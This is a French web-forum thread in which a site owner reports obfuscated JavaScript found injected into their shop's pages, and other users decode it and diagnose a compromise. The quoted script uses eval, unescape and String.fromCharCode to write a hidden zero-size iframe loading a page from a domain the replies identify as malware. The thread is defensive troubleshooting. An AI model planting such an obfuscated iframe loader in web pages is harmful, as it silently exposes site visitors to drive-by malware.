Discussion :

[letoff]

Bonjour à tous,
Nous nous retrouvons avec sur les pages de notre site le code suivant :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C115%2C105%2C110%2C97%2C107%2C105%2C115%2C46%2C99%2C110%2C47%2C98%2C97%2C110%2C101%2C114%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script></script>

Hors nous n'avons jamais intégré ce bout de code !!! Serions nous en train de nous faire hacker ? Quelqu'un saurait-il décoder ces lignes et nous les mettre en langage compréhensible ?

[vermine]

Bonjour,

Si on enlève la première balise <script>, il essaie de nous connecter à un site qui commence par "sinakis.cn..." (mais je n'ai pas su lire la suite) et tente d'ouvrir un document "Acr21.tmp" avec Acrobat Reader.
A ne pas tester car ça me semble louche.

eval permet d'évaluer et d'exécuter le code inscrit dans une chaine de caractères.

Quant à unescape:

Permet de décoder les chaînes codés en unicode avec escape. Les chaînes unicodes permettent de lire du texte sur tous les ordinateur. Ils sont composés de %XX ou uxxxx. Les premiers sont remplacés par les caractères et les secondes sont transformés en hexadécimaux.

Je n'ai pas cherché à traduire les codes pour trouver la chaine que le malandrin essaie d'obtenir mais une table pourrait vous aider à déchiffrer tout cela.

[Bovino]

Ca dit :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src="http://sinakis.cn/baner/index.php" width="0" height="0"></iframe>

Si c'est pas toi qui a mis ça dans la page, je te conseille non seulement de le retirer mais surtout de revoir la sécurité de ton site !

[E.Bzz]

+1

Avec une chtite recherche sur le oueb, on trouve sinakis.cn dans les listes de malware ...

A éliminer d'urgence !

A+

[EIN-LESER]

Tu n'utilise pas de sécurité pour les chaines de caractères que tes user peuvent saisir sut ton site?

en PHP htmlspecialchars est un grand classique par exemple sa doit exister en javascript aussi je pense

ah ces hackers ils sont tous

[letoff]

Merci à tous pour vos réponses.
Je vais préciser les choses car nous avons une tierce partie qui a accès au ftp du site et nous avons un gros doute. De plus nous avons ce problème sur une boutique en ligne Thélia dans sa dernière version qui n'est pas connu pour avoir des failles, mais ne sait-on jamais… Le tout hébergé chez OVH en mutualisé.
Pour ceux qui ont décodé en entier le message, avez-vous un lien vers le décodeur ?
Encore merci.